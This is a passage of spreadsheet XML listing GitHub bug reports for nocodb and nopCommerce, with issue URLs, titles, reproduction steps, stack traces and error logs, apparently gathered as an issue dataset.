eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InVzZXJAbm9jb2RiLmNvbSIsImZpcnN0bmFtZSI6bnVsbCwibGFzdG5hbWUiOm51bGwsImlkIjoidXNfcnl3Y3FwZmNtbTY4ZnUiLCJyb2xlcyI6InVzZXIsc3VwZXIiLCJ0b2tlbl92ZXJzaW9uIjoiZjA4MTMwOTMzNjUwNDhjYjRmMjdlMGI5Y2E2ZjY5ZjMwY2RjNDU0NWEyZjIyMmI2ZDdkMDY1ZjgwYTAzYTNjOGIxNDZlYTk3NjNhYzA4MWYiLCJpYXQiOjE2NjY3MDI2NTYsImV4cCI6MTY2NjczODY1Nn0.ymEEHLj526QrJgcfNJzJY9fCTBHXlX3GuHeG6U21Vfg\r\n' + 'User-Agent: axios/0.21.4\r\n' + 'Host: localhost:8080\r\n' + 'Connection: close\r\n' + 'Content-Length: 0\r\n' + '\r\n', _keepAliveTimeout: 0, _onPendingData: [Function: nop], agent: Agent { _events: [Object: null prototype], _eventsCount: 2, _maxListeners: undefined, defaultPort: 80, protocol: 'http:', options: [Object: null prototype], requests: [Object: null prototype] {}, sockets: [Object: null prototype], freeSockets: [Object: null prototype] {}, keepAliveMsecs: 1000, keepAlive: false, maxSockets: Infinity, maxFreeSockets: 256, scheduling: 'lifo', maxTotalSockets: Infinity, totalSocketCount: 7, [Symbol(kCapture)]: false }, socketPath: undefined, method: 'POST', maxHeaderSize: undefined, insecureHTTPParser: undefined, path: '/api/v1/db/storage/upload-by-url?path=noco%2Fx%2FShots%2FImage', _ended: true, res: IncomingMessage { _readableState: [ReadableState], _events: [Object: null prototype], _eventsCount: 3, _maxListeners: undefined, socket: [Socket], httpVersionMajor: 1, httpVersionMinor: 1, httpVersion: '1.1', complete: true, rawHeaders: [Array], rawTrailers: [], aborted: false, upgrade: false, url: '', method: null, statusCode: 400, statusMessage: 'Bad Request', client: [Socket], _consuming: false, _dumped: false, req: [Circular *1], responseUrl: 'http://localhost:8080/api/v1/db/storage/upload-by-url?path=noco%2Fx%2FShots%2FImage', redirects: [], [Symbol(kCapture)]: false, [Symbol(kHeaders)]: [Object], [Symbol(kHeadersCount)]: 12, [Symbol(kTrailers)]: null, [Symbol(kTrailersCount)]: 0, [Symbol(RequestTimeout)]: undefined }, aborted: false, timeoutCb: null, upgradeOrConnect: false, parser: null, maxHeadersCount: null, reusedSocket: false, host: 'localhost', protocol: 'http:', _redirectable: Writable { _writableState: [WritableState], _events: [Object: null prototype], _eventsCount: 2, _maxListeners: undefined, _options: [Object], _ended: true, _ending: true, _redirectCount: 0, _redirects: [], _requestBodyLength: 0, _requestBodyBuffers: [], _onNativeResponse: [Function (anonymous)], _currentRequest: [Circular *1], _currentUrl: 'http://localhost:8080/api/v1/db/storage/upload-by-url?path=noco%2Fx%2FShots%2FImage', [Symbol(kCapture)]: false }, [Symbol(kCapture)]: false, [Symbol(kNeedDrain)]: false, [Symbol(corked)]: 0, [Symbol(kOutHeaders)]: [Object: null prototype] { accept: [Array], 'content-type': [Array], 'xc-auth': [Array], 'user-agent': [Array], host: [Array] } }, response: { status: 400, statusText: 'Bad Request', headers: { 'access-control-allow-origin': '*', 'access-control-expose-headers': 'xc-db-response', 'content-type': 'application/json; charset=utf-8', 'content-length': '82', date: 'Tue, 25 Oct 2022 12:58:21 GMT', connection: 'close' }, config: { url: '/api/v1/db/storage/upload-by-url', method: 'post', headers: [Object], params: [Object], baseURL: 'http://localhost:8080', transformRequest: [Array], transformResponse: [Array], timeout: 0, adapter: [Function: httpAdapter], xsrfCookieName: 'XSRF-TOKEN', xsrfHeaderName: 'X-XSRF-TOKEN', maxContentLength: -1, maxBodyLength: -1, validateStatus: [Function: validateStatus], transitional: [Object], data: undefined }, request: &lt;ref *1&gt; ClientRequest { _events: [Object: null prototype], _eventsCount: 7, _maxListeners: undefined, outputData: [], outputSize: 0, writable: true, destroyed: false, _last: true, chunkedEncoding: false, shouldKeepAlive: false, maxRequestsOnConnectionReached: false, _defaultKeepAlive: true, useChunkedEncodingByDefault: true, sendDate: false, _removedConnection: false, _removedContLen: false, _removedTE: false, _contentLength: 0, _hasBody: true, _trailer: '', finished: true, _headerSent: true, _closed: false, socket: [Socket], _header: 'POST /api/v1/db/storage/upload-by-url?path=noco%2Fx%2FShots%2FImage HTTP/1.1\r\n' + 'Accept: application/json, text/plain, */*\r\n' + 'Content-Type: application/json\r\n' + 'xc-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InVzZXJAbm9jb2RiLmNvbSIsImZpcnN0bmFtZSI6bnVsbCwibGFzdG5hbWUiOm51bGwsImlkIjoidXNfcnl3Y3FwZmNtbTY4ZnUiLCJyb2xlcyI6InVzZXIsc3VwZXIiLCJ0b2tlbl92ZXJzaW9uIjoiZjA4MTMwOTMzNjUwNDhjYjRmMjdlMGI5Y2E2ZjY5ZjMwY2RjNDU0NWEyZjIyMmI2ZDdkMDY1ZjgwYTAzYTNjOGIxNDZlYTk3NjNhYzA4MWYiLCJpYXQiOjE2NjY3MDI2NTYsImV4cCI6MTY2NjczODY1Nn0.ymEEHLj526QrJgcfNJzJY9fCTBHXlX3GuHeG6U21Vfg\r\n' + 'User-Agent: axios/0.21.4\r\n' + 'Host: localhost:8080\r\n' + 'Connection: close\r\n' + 'Content-Length: 0\r\n' + '\r\n', _keepAliveTimeout: 0, _onPendingData: [Function: nop], agent: [Agent], socketPath: undefined, method: 'POST', maxHeaderSize: undefined, insecureHTTPParser: undefined, path: '/api/v1/db/storage/upload-by-url?path=noco%2Fx%2FShots%2FImage', _ended: true, res: [IncomingMessage], aborted: false, timeoutCb: null, upgradeOrConnect: false, parser: null, maxHeadersCount: null, reusedSocket: false, host: 'localhost', protocol: 'http:', _redirectable: [Writable], [Symbol(kCapture)]: false, [Symbol(kNeedDrain)]: false, [Symbol(corked)]: 0, [Symbol(kOutHeaders)]: [Object: null prototype] }, data: { msg: 'undefined is not iterable (cannot read property Symbol(Symbol.iterator))' } }, isAxiosError: true, toJSON: [Function: toJSON] }   Desired Behavior Import without error  Project Details Node: **v16.14.0** Arch: **arm64** Platform: **darwin** Docker: **false** Database: **sqlite3** ProjectOnRootDB: **true** RootDB: **sqlite3** PackageVersion: **0.98.1**  Attachements _No response_</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/4694</t>
  </si>
  <si>
    <t>Bug: Shared view link access (in incognito) redirects to sign-in page</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? Observed on `develop` branch; works fine in `master` - create shared view - access link in incognito mode - redirects to sign in page  authMiddleware :: Unauthorized [Error]: Unauthorized access at Function.unauthorized (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/helpers/catchError.ts:44:11) at authMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/helpers/ncMetaAclMw.ts:38:17) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:144:13) at exports.default (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/helpers/extractProjectIdAndAuthenticate.ts:144:5)   Desired Behavior access should work without redirection to sign-in page  Project Details - In develop  Attachements _No response_</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/4704</t>
  </si>
  <si>
    <t>Bug: When the primary key contains /, an error occurs when updating data</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? When the value of the primary key in my data table contains /, when updating the data, the relevant API will treat the slash as a url route, resulting in the failure of the data to be updated successfully  Desired Behavior I tried escaping the / as %2f when submitting the data update request, and that does the trick  Project Details docker  Attachements ![image](https://user-images.githubusercontent.com/81417218/209652132-bf8589df-696d-4a58-ad1a-1ef4fa015769.png)</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/5817</t>
  </si>
  <si>
    <t>Bug: [Nest] ERROR [i] Missing refresh token</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? After updating from previous version to latest version, I get this error in the docker logs:  [Nest] 1 - 06/05/2023, 4:43:37 PM ERROR [i] Missing refresh token Error: Missing refresh token at t.NcError.badRequest (/app/code/node_modules/nocodb/dist/bundle.js:1:649372) at k.refreshToken (/app/code/node_modules/nocodb/dist/bundle.js:1:1245325) at j.refreshToken (/app/code/node_modules/nocodb/dist/bundle.js:1:174280) at /app/code/node_modules/@nestjs/core/router/router-execution-context.js:38:29 at process.processTicksAndRejections (node:internal/process/task_queues:95:5) at async /app/code/node_modules/@nestjs/core/router/router-execution-context.js:46:28 at async /app/code/node_modules/@nestjs/core/router/router-proxy.js:9:17  Just open the logon page and check the logging of the docker container. Issue didn't occur in previous versions of nocodb.  Desired Behavior No error thrown  Project Details Node: **v18.12.1** Arch: **x64** Platform: **linux** Docker: **true** RootDB: **pg** PackageVersion: **0.108.1**  Attachments _No response_</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/6202</t>
  </si>
  <si>
    <t>Bug: while primary key values contain "/" symbol, expand the row to get Record not found banner.</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? While Primary key values contain "/" symbol, expand the row to get Record not found banner.  Desired Behavior Rows should expand regardless of the value of primary key.  Project Details Node: **v16.20.0** Arch: **x64** Platform: **linux** Docker: **true** RootDB: **sqlite3** PackageVersion: **0.109.6**  Attachments docker logs shows : Nest] 11 - 08/21/2023, 11:12:01 AM ERROR [i] Cannot GET /api/v1/db/data/noco/p_gcht7dh17qylek/Api/GET%20/api/v./insuranceplans//benefits NotFoundException: Cannot GET /api/v1/db/data/noco/p_gcht7dh17qylek/Api/GET%20/api/v./insuranceplans//benefits at callback (/usr/src/app/node_modules/@nestjs/core/router/routes-resolver.js:77:19) at /usr/src/app/node_modules/@nestjs/core/router/router-proxy.js:9:23 at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5) at trim_prefix (/usr/src/app/node_modules/express/lib/router/index.js:328:13) at /usr/src/app/node_modules/express/lib/router/index.js:286:9 at Function.process_params (/usr/src/app/node_modules/express/lib/router/index.js:346:12) at next (/usr/src/app/node_modules/express/lib/router/index.js:280:10) at next (/usr/src/app/node_modules/express/lib/router/route.js:136:14) at next (/usr/src/app/node_modules/express/lib/router/route.js:140:7) at next (/usr/src/app/node_modules/express/lib/router/route.js:140:7) </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/6246</t>
  </si>
  <si>
    <t>Bug: Webhook call sending Parameters doesn't work</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? Hey there, since the last update the sending Parameters via web hook fails. 1. Create Webhook 2. Create parameters 3. Test webhook 4. Newly created parameters (after the update) are not attached to the web hook 5. Parameters created before the update are attached to the web hook  Desired Behavior attach all Parameters. I think the issue is, that in the current version the check boxes are missing for the parameters. When you go on the headers tab, then the check boxes are still there.  Project Details Node: **v16.20.1** Arch: **x64** Platform: **linux** Docker: **true** RootDB: **pg** PackageVersion: **0.111.0**  Attachments &lt;img width="752" alt="Bildschirmfoto 2023-08-27 um 11 39 13" src="https://github.com/nocodb/nocodb/assets/22481238/8c27d340-a3d6-44a4-b86a-2de7e5f32c11"&gt; &lt;img width="743" alt="Bildschirmfoto 2023-08-27 um 11 39 07" src="https://github.com/nocodb/nocodb/assets/22481238/d710b9c5-a916-411c-a174-e30ea12b19d1"&gt;</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/7241</t>
  </si>
  <si>
    <t>Bug: `/email/verify/:token` no longer exists so users see a 404 when they try to follow the verify email link</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? * Try to verify someone's email * They get a link to /email/verify/some-uuid-token * They see a 404 from the backend  Desired Behavior They should get their email validated  Project Details Node: **v18.18.2** Arch: **x64** Platform: **linux** Docker: **false** (it's running on kubernetes) RootDB: **pg** PackageVersion: **0.202.10**  Attachments _No response_</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/7451</t>
  </si>
  <si>
    <t>Bug: Kanban view loadMoreKanbanData api is failing due to incorrect offset payload</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? API response: json {"msg":"Offset is beyond the total number of records"}  https://github.com/nocodb/nocodb/assets/101566080/a59dd51b-ad11-4740-82ae-e2dbdff27b17  Desired Behavior Before making api call check the `totalRows` and then call api if `currentRecords` is less than `totalRows` json "list": [], "pageInfo": { "totalRows": 48, "page": 2, "pageSize": 25, "isFirstPage": false, "isLastPage": true }   Project Details 0.204.0  Attachments _No response_</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/7473</t>
  </si>
  <si>
    <t>Bug: email verification not working</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? When inviting new users to a workspace the verify Email is being sent but the link responds 404 {"msg":"Cannot GET /email/verify/email_verification_token"}  Desired Behavior should verify sucessfully On the other hand - in case of invitation i would prefer to skip this entirely and go on with setting a password for the new user.  Project Details Node: **v18.18.2** Arch: **x64** Platform: **linux** Docker: **true** RootDB: **mysql2** PackageVersion: **0.204.0**  Attachments _No response_</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/7501</t>
  </si>
  <si>
    <t>Bug: When searching for a non-existant entry it is fine on page 1 of tables but shows"internal error" when doing the same in any other page number.</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? Bug: When searching for a non-existant entry it is fine on page 1 but shows"internal error" when doing the same in any other page number. 1. Create 30 entries. 2. Got to page 2 which now shows 5 entries. 3. Search for non-existant entry. 4. See internal error happen.  Desired Behavior It should just show no result or the result as applicable like it does on page 1  Project Details Nocodb latest with docker. postgres.  Attachments ![image](https://github.com/nocodb/nocodb/assets/43231640/90d09b5e-e34f-4f43-acc7-ac7d53a2ce4a) Nothing in the logs about the problem.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/7511</t>
  </si>
  <si>
    <t>Bug: webhook trigger on triggering delete of selected records</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? webhook trigger when - multiple records are selected in one go &amp; `Delete selected records` : bulk delete trigger - one record is selected and `Delete selected records ` : bulk delete trigger  Desired Behavior for the latter case, it should be `delete` trigger instead of `bulk.delete`  Project Details 204.0  Attachments _No response_</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/7535</t>
  </si>
  <si>
    <t>Bug: VIEWER can't receive form e-mail notifications</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce - ORGANIZATION LEVEL CREATOR creates base, table, and form for it. - adds ORGANIZATION LEVEL VIEWER user to the base with role CREATOR - VIEWER opens the form and click on the "E-mail me at user@example.com"  Issue: - Switch shows, as enabled, but actual request is HTTP 403 https://example.com/api/v1/db/meta/plugins/SMTP/status {"msg":"isPluginActive - : Not allowed"} - Emails are never sent - If form reloaded - the switch is disabled Also, I haven't found a way for invited user (neither CREATOR nor VIEWER) to view or configure plugins. If the invited user is CREATOR, then e-mails are working, but still - no way to view or configure plugins.  Desired Behavior VIEWER receive email notifications  Project Details v0.204.0 in Docker with Postgres 16.1 with SMTP server on the same LAN: environment: NC_SMTP_FROM: "user@example.com" NC_SMTP_HOST: "example.com" NC_SMTP_PORT: 25 NC_SMTP_USERNAME: "user" NC_SMTP_PASSWORD: ""</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/7848</t>
  </si>
  <si>
    <t>Bug: typo in swagger response "BadReqeust"</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exist already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? Open the API v2 docs and look at the 400 response.  Desired Behavior The response being called "BadRequest"  Project Details not applicable.  Attachments _No response_</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/9055</t>
  </si>
  <si>
    <t>Bug: Accessing the page through the sharing link of Base, there exists the create view button under the table of the left-sidebar, but creating a new view through the create view button will get an error message: Request failed with status code 403</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm that the bug report does not already exist - [X] I confirm there is no existing issue for this bug.  Steps to reproduce 1. Click the share button in the upper right corner 2. Open sharing link of the Base 3. Accessing the sharing link 4. Expand the table under the shared Base and you will find the create view button 5. Creating a new view through the create view button, then you will get an error message: Request failed with status code 403  Desired Behavior 1. I want to know if it was specifically designed this way or if this is a bug 2. if this is a bug, I think the create view button should be hidden  Project Details Node: **v20.12.1** Arch: **x64** Platform: **linux** Docker: **true** RootDB: **mysql2** PackageVersion: **0.250.2**  Attachments _No response_</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/10608</t>
  </si>
  <si>
    <t>Bug: Form View with Attachment and Links Field, entry triggers "Failed to load list"</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm that the bug report does not already exist - [x] I confirm there is no existing issue for this bug.  Steps to reproduce 1. Create a Form View which has both an Attachment and a Links (many-to-many) field (and some example data, of course) 2. Fill in the attachment field *first* (i.e. by picking a file from the local machine, upload it) 3. Attempt to fill in the Links field (click the plus button next to "No records linked", expect an autocomplete-ish drop down) 4. Error message: "Failed to load list: something went wrong"; there is no list of records to select from ("No records match your search query"); inputs into the search field re-trigger the error above  Desired Behavior No error :), Link should be selectable (without the workaround to select it first, *then* picking a file)  Project Details Node: **v22.14.0** Arch: **x64** Platform: **linux** Docker: **true** RootDB: **pg** PackageVersion: **0.262.0**  Attachments Analysis: The Link field attempts to populate possible record values by requesting/fetching the endpoint `/api/v1/db/public/shared-view/$UUID/nested/$BASE36ISHSTRING`. It **GET**s a query which roughly decodes to: `{ limit: 10, offset: 0, fields: []`, but also, `rowData: { TheAttachmentField: [ {,"title":"TheFilename.jpg","data":"base64,/TheFullFileEncodedInBase64AAAAA`,. The size of the GET request (I think) makes it fail; even for quite small files. Chrom* reports this as `net::ERR_CONNECTION_CLOSED` in the console, Firefox is rather silent on my machine. The file (contents) shouldn't be appended to the query in the first place, I guess. As far as I can tell, this happens ultimately here: https://github.com/nocodb/nocodb/blob/0cadb29e18e7f503bace209275e7148716eccd35/packages/nc-gui/composables/useLTARStore.ts#L213 ![Image](https://github.com/user-attachments/assets/9020300a-47b1-420c-8ad4-3cdf09a50b40) ![Image](https://github.com/user-attachments/assets/a5595154-de08-4e85-aff9-5c4087550a92)</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/183</t>
  </si>
  <si>
    <t>General error fix for the "Error during serialization" issues (admin area only)</t>
  </si>
  <si>
    <t>When we have too long json return we can get an exception - http://www.nopcommerce.com/boards/t/38582/blog-posts-not-appearing-in-admin-screen.aspx However, adding this override on BaseController will fix the issue in cases we need the content to be on the first place:  protected override JsonResult Json(object data, string contentType, Encoding contentEncoding, JsonRequestBehavior behavior) { return new JsonResult() { Data = data, ContentType = contentType, ContentEncoding = contentEncoding, JsonRequestBehavior = behavior, MaxJsonLength = Int32.MaxValue }; }  Source: http://www.nopcommerce.com/boards/t/38582/blog-posts-not-appearing-in-admin-screen.aspx?p=2</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/1602</t>
  </si>
  <si>
    <t>Category/manufacturer import/export doesn't work as expected</t>
  </si>
  <si>
    <t>SeName is not exported. Hence it's not imported for new categories. New categories and manufacturers don't have "search engine friendly name"</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/1731</t>
  </si>
  <si>
    <t>Search starts with &lt; shows error</t>
  </si>
  <si>
    <t>When we search any term starting with &lt; sign (i.e: &lt;abc) in search box it goest to errorpage and show internal issue. kindly check this Source: http://www.nopcommerce.com/boards/t/44053/search-starts-with-shows-error.aspx</t>
  </si>
  <si>
    <t xml:space="preserve">it modifies thesrc/Presentation/Nop.Web/Controllers/CatalogController.cs files </t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/1738</t>
  </si>
  <si>
    <t>Do not allow to specify 0 as "Page Size" (categories, vendors, manufacturers). Only positive values</t>
  </si>
  <si>
    <t>Otherwise, exception will be thrown in public store - http://www.nopcommerce.com/boards/t/44098/bugexception-when-you-put-page-size-to-0-for-category.aspx let's just ensure that it'll work fine when "Allow customers to select page size" is enable (hence "Page Size" field is hidden but still set to 0)</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/1811</t>
  </si>
  <si>
    <t>Vendors can see other vendor products in PDF</t>
  </si>
  <si>
    <t>When customer made order with products from at least two different vendors, each vendor may see just only own products, without any information about other products which do not belong to others. But if this same vendor will print invoice, will be able to see all products made by customer. Source: http://www.nopcommerce.com/boards/t/44621/vendor-pdf.aspx Furthermore, on some pages this button is hidden (details page) and on some it's not (list). And "PdfInvoiceAll" method has validation for vendors. But "PdfInvoiceSelected" has not</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/2532</t>
  </si>
  <si>
    <t>Make "Country" required in the Estimate shipping form</t>
  </si>
  <si>
    <t>It has a required asterisk but you still can leave this field empty</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/2776</t>
  </si>
  <si>
    <t>/customer/productreviews doesn't respect Product's LimitToStores setting</t>
  </si>
  <si>
    <t>How to reproduce - 1. Setup two stores 2. Create a product and limit it to Store 1 3. Write a review for the product 4. Go to /customer/productreviews at Store 2 5. The review will be visible, even though it cannot be loaded</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/2777</t>
  </si>
  <si>
    <t>/customer/productreviews shows reviews on deleted products</t>
  </si>
  <si>
    <t>How to reproduce - 1. Create a product 2. Leave a review on said product 3. Delete said product 4. Go to /customer/productreviews 5. Note, the review is visible</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3139</t>
  </si>
  <si>
    <t>Error when using a URL (store) that does not exist. It should throw error with usable errormessage.</t>
  </si>
  <si>
    <t>nopCommerce version: 4.1 Steps to reproduce the problem: If you have a url in the store(settings) that does not exist, you get a 502 error with no real error message. In order to find the real error, you have to debug the solution and get "No such host". Should there be a seperate URL for development?</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3174</t>
  </si>
  <si>
    <t>Entity (Product, category, manufacturer, etc) seo name isn't changed based on language selection</t>
  </si>
  <si>
    <t>nopCommerce version: beta 4.10 Steps to reproduce the problem: I added one language German. After i edited Apple-Icam product name and seo name in German language product name = to ICAM(German tab) Seo name = v-scla-hiu-new-york Front side when i opened product detail for English and German language . Working fine for both but **url seo** name is not changed based on language. Also,i enabled seo friendly url.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3260</t>
  </si>
  <si>
    <t>Price not updated when multiples rental products are linked to the same grouped product</t>
  </si>
  <si>
    <t>nopCommerce version: 4.1 (not tested on previous version) Steps to reproduce the problem: - Create a **grouped** product. Let's call it "Book" - Create a simple product of type **rental**. Let's call it "Book Daily" and link it to the grouped product named Book - Create a simple product of type **rental**. Let's call it "Book Monthly" and link it to the grouped product named Book - On front end side, open the product page "Book", below are displayed all the products linked to this grouped product family "Book":. - When we update the starting and ending rental date of "Book Daily", the price is not updated at all First investigation: - Analysing the issue with Chrome console, it seems that the bug is linked to multiple definition of JS functions that should update the price. (they use the same name). Because of that, the wrong method is called and therefore wrong parameters are sent to the backend. After that on backend side, a null pointer exception happended and the price cannot be calculated again. Thanks</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3376</t>
  </si>
  <si>
    <t>Advance search is not working</t>
  </si>
  <si>
    <t>nopCommerce version: 4.10 Steps to reproduce the problem: 1. Go to nopCommerce demo store 2. Type "Apple" in search box and click on search button (page URL - http://demo.nopcommerce.com/search?q=apple ) 3. Now check Advanced search checkbox and click on search button (page URL - http://demo.nopcommerce.com/search?q=apple&amp;adv=true&amp;cid=0&amp;mid=0&amp;pf=&amp;pt=&amp;adv=false&amp;isc=false&amp;sid=false ) 4. Now select any option from Catalog selector (Sort option/Page Size/Display Mode) - **it will throw an error** (Selected sort by Name - A to Z - http://demo.nopcommerce.com/search?q=apple&amp;adv=true,false&amp;cid=0&amp;mid=0&amp;pf=&amp;pt=&amp;isc=false&amp;sid=false&amp;orderby=5) Error Message:  An unhandled exception occurred while processing the request. FormatException: String was not recognized as a valid Boolean. bool.Parse(ReadOnlySpan&lt;char&gt; value) FormatException: true,false is not a valid value for Boolean. Nop.Web.Framework.Infrastructure.Extensions.ApplicationBuilderExtensions+&lt;&gt;c.&lt;UseNopExceptionHandler&gt;b__1_1(HttpContext context) in ApplicationBuilderExtensions.cs, line 85  Here in last url parameter adv = adv=true,false if you selected option **Search In product descriptions ** as true then parameter : sid=true,false I looked in source and found input tag (i.e. &lt;input asp-for="sid" /&gt;)generate two times input. Here is source image: ![advance-search](https://user-images.githubusercontent.com/13154058/46921627-4f6c6b80-d01b-11e8-88aa-7a4a63d140c0.png)</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3382</t>
  </si>
  <si>
    <t>Redis cache clear error in nopCommerce 4.10</t>
  </si>
  <si>
    <t>nopCommerce version: 4.10 Steps to reproduce the problem: 1. Enable Redis cache. 2. Open admin page. 3. Click "Clear cache" Application returns code 500 error.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3411</t>
  </si>
  <si>
    <t>Form value count limit 2048 exceeded.</t>
  </si>
  <si>
    <t>nopCommerce version: 4.1 Steps to reproduce the problem: We have around 25 methods in Admin/Shipping/Restrictions multiplied for around 250 countries we get around 6250 elements in the form, far more than 2048 limit. Full error here: &gt; System.IO.InvalidDataException: Form value count limit 2048 exceeded. &gt; at Microsoft.AspNetCore.WebUtilities.FormReader.Append(KeyValueAccumulator&amp; accumulator) &gt; at Microsoft.AspNetCore.WebUtilities.FormReader.ReadFormAsync(CancellationToken cancellationToken) &gt; at Microsoft.AspNetCore.Http.Features.FormFeature.InnerReadFormAsync(CancellationToken cancellationToken) &gt; at Microsoft.AspNetCore.Mvc.ModelBinding.FormValueProviderFactory.AddValueProviderAsync(ValueProviderFactoryContext context) &gt; at Microsoft.AspNetCore.Mvc.ModelBinding.CompositeValueProvider.CreateAsync(ActionContext actionContext, IList`1 factories) &gt; at Microsoft.AspNetCore.Mvc.ModelBinding.CompositeValueProvider.CreateAsync(ControllerContext controllerContext) &gt; at Microsoft.AspNetCore.Mvc.Internal.ControllerBinderDelegateProvider.&lt;&gt;c__DisplayClass0_0.&lt;&lt;CreateBinderDelegate&gt;g__Bind|0&gt;d.MoveNext() &gt;  End of stack trace from previous location where exception was thrown  &gt; at Microsoft.AspNetCore.Mvc.Internal.ControllerActionInvoker.InvokeInnerFilterAsync() &gt; at Microsoft.AspNetCore.Mvc.Internal.ResourceInvoker.InvokeNextResourceFilter() &gt; at Microsoft.AspNetCore.Mvc.Internal.ResourceInvoker.Rethrow(ResourceExecutedContext context) &gt; at Microsoft.AspNetCore.Mvc.Internal.ResourceInvoker.Next(State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) &gt; at Microsoft.AspNetCore.Mvc.Internal.ResourceInvoker.InvokeFilterPipelineAsync() &gt; at Microsoft.AspNetCore.Mvc.Internal.ResourceInvoker.InvokeAsync() &gt; at Microsoft.AspNetCore.Builder.RouterMiddleware.Invoke(HttpContext httpContext) &gt; at StackExchange.Profiling.MiniProfilerMiddleware.Invoke(HttpContext context) in C:\projects\dotnet\src\MiniProfiler.AspNetCore\MiniProfilerMiddleware.cs:line 94 &gt; at Nop.Services.Authentication.AuthenticationMiddleware.Invoke(HttpContext context) in C:\andrei\nopcommerce\sources\src\Libraries\Nop.Services\Authentication\AuthenticationMiddleware.cs:line 79 &gt; at Microsoft.AspNetCore.Localization.RequestLocalizationMiddleware.Invoke(HttpContext context) &gt; at Microsoft.AspNetCore.Session.SessionMiddleware.Invoke(HttpContext context) &gt; at Microsoft.AspNetCore.Session.SessionMiddleware.Invoke(HttpContext context) &gt; at Nop.Core.Http.InstallUrlMiddleware.Invoke(HttpContext context, IWebHelper webHelper) in C:\andrei\nopcommerce\sources\src\Libraries\Nop.Core\Http\InstallUrlMiddleware.cs:line 51 &gt; at Nop.Core.Http.KeepAliveMiddleware.Invoke(HttpContext context, IWebHelper webHelper) in C:\andrei\nopcommerce\sources\src\Libraries\Nop.Core\Http\KeepAliveMiddleware.cs:line 50 &gt; at Microsoft.AspNetCore.StaticFiles.StaticFileMiddleware.Invoke(HttpContext context) &gt; at Microsoft.AspNetCore.StaticFiles.StaticFileMiddleware.Invoke(HttpContext context) &gt; at Microsoft.AspNetCore.StaticFiles.StaticFileMiddleware.Invoke(HttpContext context) &gt; at Microsoft.AspNetCore.StaticFiles.StaticFileMiddleware.Invoke(HttpContext context) &gt; at 